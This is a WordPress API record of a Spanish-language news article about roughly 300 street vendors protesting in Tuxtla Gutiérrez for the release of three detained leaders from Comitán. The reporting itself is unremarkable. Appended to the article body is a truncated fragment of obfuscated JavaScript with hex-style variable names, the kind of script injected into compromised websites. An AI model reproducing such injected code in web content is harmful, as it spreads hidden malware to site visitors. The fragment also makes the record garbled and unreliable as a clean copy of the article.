{"id":24910,"date":"2025-11-05T02:21:07","date_gmt":"2025-11-05T02:21:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24910"},"modified":"2025-11-05T02:21:08","modified_gmt":"2025-11-05T02:21:08","slug":"ambulantes-piden-liberacion-de-companeros","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24910","title":{"rendered":"Ambulantes piden liberaci\u00f3n de compa\u00f1eros"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419681-1024x576.jpg\" alt=\"\" class=\"wp-image-24911\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419681-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419681-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419681-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419681.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<br>4 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Con consignas y pancartas, alrededor de 300 integrantes de una organizaci\u00f3n de vendedores ambulantes se manifestaron este martes 4 de noviembre frente a Palacio de Gobierno para exigir la liberaci\u00f3n de Santiago y Nancy Calvo L\u00f3pez, as\u00ed como de Juan D\u00edaz Montejo, detenidos desde inicios de 2025 en Comit\u00e1n de Dom\u00ednguez y recluidos actualmente en el penal de El Amate, en Cintalapa.<br>Los manifestantes, provenientes de Comit\u00e1n, aseguraron que los arrestos responden a una persecuci\u00f3n pol\u00edtica por organizarse y ejercer su derecho al trabajo informal. \u201cFueron detenidos hace casi un a\u00f1o y no hemos recibido ninguna respuesta concreta del gobierno. Lo \u00fanico que pedimos es su libertad\u201d, afirm\u00f3 Jes\u00fas L\u00f3pez, representante del grupo.<br>De acuerdo con los asistentes, los tres detenidos son l\u00edderes de una asociaci\u00f3n de comerciantes ambulantes de bajos recursos que utilizan las calles de Comit\u00e1n para vender sus productos. \u201cNos acusan de usar las v\u00edas p\u00fablicas, pero lo hacemos por necesidad, para sostener a nuestras familias\u201d, explic\u00f3 uno de los manifestantes.<br>Romeo Farreira Vicente, otro de los participantes, alert\u00f3 sobre el delicado estado de salud de los presos. \u201cAmbos son diab\u00e9ticos y tienen problemas renales. Nancy incluso se desmay\u00f3 hace unos d\u00edas; su estado es grave y no est\u00e1n recibiendo la atenci\u00f3n m\u00e9dica necesaria\u201d, denunci\u00f3.<br>Farreira record\u00f3 que, desde febrero de 2020, entregaron un documento al gobierno estatal solicitando medidas de protecci\u00f3n para Santiago y Nancy debido a las amenazas y hostigamientos que sufr\u00edan. \u201cHoy esas medidas nunca llegaron y ahora est\u00e1n presos. Por eso pedimos que el gobernador intervenga directamente\u201d, expres\u00f3.<br>Los tres detenidos enfrentan acusaciones por atentado contra la paz y ataques a las v\u00edas de comunicaci\u00f3n, delitos que sus compa\u00f1eros calificaron como \u201cfabricados\u201d para inhibir la organizaci\u00f3n social de los comerciantes en Comit\u00e1n. Hasta el momento, no existe una sentencia en su contra.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.4 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Con consignas y pancartas, alrededor de 300 integrantes de una organizaci\u00f3n de vendedores ambulantes se manifestaron este martes 4 de noviembre frente a Palacio de Gobierno para exigir la liberaci\u00f3n de Santiago y Nancy Calvo L\u00f3pez, as\u00ed como de Juan D\u00edaz Montejo, detenidos desde inicios de 2025 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24911,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24910","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24910","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24910"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24910\/revisions"}],"predecessor-version":[{"id":24912,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24910\/revisions\/24912"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24911"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24910"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24910"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24910"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}